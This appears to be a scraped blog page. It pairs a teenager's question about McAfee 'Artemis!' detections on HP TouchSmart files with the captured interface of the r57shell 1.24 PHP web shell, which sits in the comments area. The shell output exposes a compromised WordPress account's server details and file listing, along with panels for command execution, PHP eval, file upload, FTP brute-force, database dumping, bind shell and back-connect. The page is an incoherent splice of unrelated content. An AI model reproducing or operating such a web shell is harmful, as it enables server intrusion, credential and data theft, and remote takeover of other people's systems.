May

McAfee Scan – Artemis! Issue !?

by admin

I am doing a McAfee scan right now. I find there is three items detected. They are quarantied at the moment. There is three options, Remove, Restore (fix infected file) or Send to McAfee to examine. It is called:

1)
Detection name: Artemis!98808CB47DF4

File: C:\Program Files\Hewlett-Packard\TouchSmart\Media\Kernel\DMP\CLAudSpa.ax

Process: C:\Windows\system32\msiexec.exe

Process description: Windows installer

2)
Detection name: Artemis!7D771BACDDD8

File: C:\Program Files\Hewlett-Packard\TouchSmart\Media\Kernel\DMP\clauts.ax

Process: C:\Windows\system32\msiexec.exe

Process description: Windows installer

What should I do, should I: Remove, Restore (Repairs ?) or McAfee Examine the files.

Is Artemis! normally fake by any chance ?
Some people say it’s nothing ?

Please can you help me ?
Today, I have sent the Artemis! items to McAfee and I put a comment on the forum. What does a legitimate mean ?
I’m only a teenager. Yep I will probably restore the files. Can I restore a ‘DATA1.CAB (C:\SWSETUP\SP43648\DATA1.CAB) ?
Should I RESTORE all the files ? I will do a full scan again. I think that Artemis! are fakes. Why?
I restored them but they multiply like mad, I might as well remove them instead. I just restored them and it multiplied it. So what should I do ?
basically, I restored it. I did a scan, and the artemis multiplyed, so I think I will have to remove it.

Microsoft Security Essentials
http://www.microsoft.com/security_essentials/?mkt=en-us
FREE FOREVER
screenshot-http://arstechnica.com/microsoft/news/2009/06/leaked-microsoft-security-essentials-codename-morro.ars
Video Instructions on how to install and use-
http://www.microsoft.com/security_essent…
Review of MSE-
http://www.theregister.co.uk/2009/10/01/ms_security_essentials_review/

2 Comments

1072

2 Comments

r57shell 404 Not Found

404 Not Found

The server can not find the requested page:

127.0.0.1/r57shell/version.php?version=124 (port 80)

Please forward this error screen to 127.0.0.1's WebMaster.

! r57shell 1.24

  07-02-2012 23:15:49  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]
  safe_mode: OFF  PHP version: 5.2.17  cURL: ON  MySQL: ON  MSSQL: OFF  PostgreSQL: ON  Oracle: OFF
  Disable functions : NONE
  HDD Free : 340.96 GB HDD Total : 802.94 GB

uname -a :
sysctl :
$OSTYPE :
Server :
id :
pwd :

   Linux useast6.myserverhosts.com 2.6.18-338.5.1.el5.lve0.8.29 #1 SMP Sat Apr 23 01:52:48 EEST 2011 x86_64 x86_64 x86_64 G
   -
   linux-gnu
   Apache
   uid=1610(kernelx7) gid=1598(kernelx7) groups=1598(kernelx7)
   /home/kernelx7/public_html   ( drwxr-x--- )

Executed command: ls -lia

total 1400 187140386 -rw-r--r-- 1 kernelx7 kernelx7 0 Jan 2 19:02 -1' 187138107 drwxr-x--- 16 kernelx7 nobody 4096 Dec 29 23:23 . 187138079 drwx--x--x 9 kernelx7 kernelx7 4096 Mar 20 2010 .. 187138310 -rwxrwxrwx 1 kernelx7 kernelx7 207 Aug 4 2011 .htaccess 187138108 drwxr-xr-x 2 kernelx7 kernelx7 4096 Oct 29 2010 _private 187138109 drwxr-xr-x 4 kernelx7 kernelx7 4096 Jan 19 01:03 _vti_bin 187138112 drwxr-xr-x 2 kernelx7 kernelx7 4096 Oct 29 2010 _vti_cnf 187138311 -rw-r--r-- 1 kernelx7 kernelx7 1754 Sep 20 2009 _vti_inf.html 187138113 drwxr-xr-x 2 kernelx7 kernelx7 4096 Oct 29 2010 _vti_log 187138114 drwxr-x--- 2 kernelx7 nobody 4096 Oct 29 2010 _vti_pvt 187138115 drwxr-xr-x 2 kernelx7 kernelx7 4096 Oct 29 2010 _vti_txt 187138116 drwxr-xr-x 2 kernelx7 kernelx7 4096 Sep 20 2009 cgi-bin 187140385 -rw-r--r-- 1 kernelx7 kernelx7 0 Jan 2 19:02 dump.sql 187138312 -rw-r----- 1 kernelx7 kernelx7 2 Sep 21 2009 empty.php 187140316 -rw-r--r-- 1 kernelx7 kernelx7 576930 Feb 2 22:45 error_log 187138117 drwxr-xr-x 2 kernelx7 kernelx7 4096 Sep 20 2009 images 187138313 -rw-r----- 1 kernelx7 kernelx7 2910 Sep 9 2009 index.php 187138314 -rw-r----- 1 kernelx7 kernelx7 792 Sep 21 2009 install_wpd-autolink.php 187138315 -rw-r--r-- 1 kernelx7 kernelx7 15410 Sep 9 2009 license.txt 187138316 -rw-r--r-- 1 kernelx7 kernelx7 2447 Sep 20 2009 postinfo.html 187138317 -rw-r--r-- 1 kernelx7 kernelx7 7642 Sep 9 2009 readme.html 187138318 -rwxrwxrwx 1 kernelx7 kernelx7 435208 Dec 25 10:57 sitemap.xml 187138319 -rwxrwxrwx 1 kernelx7 kernelx7 1 Jul 4 2008 sitemap.xml.gz 187138118 drwxr-xr-x 7 kernelx7 kernelx7 4096 Sep 9 2009 wp-admin 187138320 -rw-r----- 1 kernelx7 kernelx7 40543 Sep 9 2009 wp-app.php 187138321 -rw-r----- 1 kernelx7 kernelx7 220 Sep 9 2009 wp-atom.php 187138322 -rw-r----- 1 kernelx7 kernelx7 274 Sep 9 2009 wp-blog-header.php 187138323 -rw-r----- 1 kernelx7 kernelx7 3649 Sep 9 2009 wp-comments-post.php 187138324 -rw-r----- 1 kernelx7 kernelx7 238 Sep 9 2009 wp-commentsrss2.php 187138325 -rw-r----- 1 kernelx7 kernelx7 2626 Sep 9 2009 wp-config-sample.php 187138326 -rw-r----- 1 kernelx7 kernelx7 964 Sep 21 2009 wp-config.php 187138124 drwxr-xr-x 7 kernelx7 kernelx7 4096 Sep 16 11:24 wp-content 187138327 -rw-r----- 1 kernelx7 kernelx7 1254 Sep 9 2009 wp-cron.php 187138328 -rw-r----- 1 kernelx7 kernelx7 220 Sep 9 2009 wp-feed.php 187138216 drwxr-xr-x 6 kernelx7 kernelx7 4096 Sep 30 2009 wp-includes 187138329 -rw-r----- 1 kernelx7 kernelx7 1946 Sep 9 2009 wp-links-opml.php 187138330 -rw-r----- 1 kernelx7 kernelx7 2341 Sep 9 2009 wp-load.php 187138331 -rw-r----- 1 kernelx7 kernelx7 21230 Sep 9 2009 wp-login.php 187138332 -rw-r----- 1 kernelx7 kernelx7 7113 Sep 9 2009 wp-mail.php 187138333 -rw-r----- 1 kernelx7 kernelx7 487 Sep 9 2009 wp-pass.php 187138334 -rw-r----- 1 kernelx7 kernelx7 218 Sep 9 2009 wp-rdf.php 187138335 -rw-r----- 1 kernelx7 kernelx7 316 Sep 9 2009 wp-register.php 187138336 -rw-r----- 1 kernelx7 kernelx7 218 Sep 9 2009 wp-rss.php 187138337 -rw-r----- 1 kernelx7 kernelx7 220 Sep 9 2009 wp-rss2.php 187138338 -rw-r----- 1 kernelx7 kernelx7 21520 Sep 9 2009 wp-settings.php 187138339 -rw-r----- 1 kernelx7 kernelx7 3434 Sep 9 2009 wp-trackback.php 187138286 drwxr-xr-x 5 kernelx7 kernelx7 4096 Sep 21 2009 wpanswers 187138290 drwxr-xr-x 6 kernelx7 kernelx7 4096 Sep 21 2009 wpshopping 187138340 -rw-r----- 1 kernelx7 kernelx7 25583 Oct 10 2009 wpsql-fe6cbb5408d41d59ef0f.php 187138341 -rw-r----- 1 kernelx7 kernelx7 92522 Sep 9 2009 xmlrpc.php 187138295 drwxr-xr-x 5 kernelx7 kernelx7 4096 Sep 21 2009 youtube2wordpress

:: Execute command on server ::

Run command ?
Work directory ?

:: Edit files ::

File for edit ?

:: Aliases ::

Select alias ?

:: Find text in files ::

Find text ?
In dirs ?	* ( /root;/home;/tmp )
Only in files ?	* ( .txt;.php;.htm )

:: Search text in files via find ::

Text for find ?
Find in folder ?	* ( /root;/home;/tmp )
Find in files ?	* you can use regexp

:: Eval PHP code ::

:: Upload files on server ::

Local file ?
New name ?

:: Upload files from remote server ::

With ?	Remote file ?
Local file ?

:: Download files from server ::

file ?
Archivation ?	without archivation zip gzip bzip

:: FTP ::

Download files from remote ftp-server

FTP-server:port ?
Login ?
Password ?
File on ftp ?
Local file ?
Transfer mode ?

Send file to remote ftp server

FTP-server:port ?
Login ?
Password ?
Local file ?
File on ftp ?
Transfer mode ?

:: FTP-bruteforce ::

FTP-server:port ?
	* use username from /etc/passwd for ftp login and password ( Users list )
	Use reverse (user -> resu) login for password

:: Mail ::

Send email

To ?
From ?
Subj ?
Mail ?	mail text here

Send file to email

To ?
From ?
Subj ?
Local file ?
Archivation ?	without archivation zip gzip bzip

:: Databases ::

Show database structure

Type ?
Port ?
Login ?
Password ?
show tables ?
show columns ?

Dump database table

Type ?
Port ?
Login ?
Password ?
Database ?
Table ?
Save dump in file ?
file ?

Run SQL query

Type ?
Port ?
Login ?
Password ?
Database ?
SQL query ?

:: Net ::

Bind port to /bin/bash

Port ?
Password for access ?
Use ?

back-connect

IP ?
Port ?
Use ?

datapipe

Local port ?
Remote host ?
Remote port ?
Use ?

o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.24 ]---o

Kernel Bench

Kernel News and How To

McAfee Scan – Artemis! Issue !?

2 Comments

404 Not Found

Categories

Archives